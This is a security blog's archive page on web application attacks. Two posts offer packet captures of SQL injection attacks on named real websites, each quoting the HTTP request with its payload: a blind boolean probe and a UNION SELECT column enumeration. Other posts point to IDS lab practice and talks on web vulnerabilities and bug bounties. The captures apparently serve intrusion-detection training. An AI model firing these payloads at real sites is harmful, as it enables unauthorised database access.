Category Archives: Web Application Attacks

Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

Download Active Business DIrectory Remote Blind SQL Injection PCAP : remoteblindsql.pcap     2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 .. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 Host: www.activewebsoftwares.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8… Read More »

Share Button

Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli 2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1 .. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1 Host: www.musicza.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset:… Read More »

Share Button

So you want a job as a Network Security Analyst? Network Intrusion Detection Practice

  Network security analysis takes a lot of experience, the best way you can get real world experience is by setting up your own testing environment lab. Download WireShark and TCPDUMP – these tools will be used to monitor live traffic you will generate. Make sure you have some type of Virtual Machine software and… Read More »

Share Button

How To Break Web Software – A look at security vulnerabilities in web software

Google Tech Talk on Website Application Security Vulnerabilities and Mitigation Strategies  

Share Button

Bug Hunting Bounties – Finding Website Vulnerabilities – How To Shot Web – Jason Haddix’s talk from DEFCON23

Jason Haddix explores successful tactics and tools used by himself and the best bug hunters. Practical methodologies, tools and tips that make you better at hacking websites and mobile apps to claim those bug bounties. Download Slides Here: http://www.slideshare.net/bugcrowd/how-do-i-shot-web-jason-haddix-at-defcon-23  

Share Button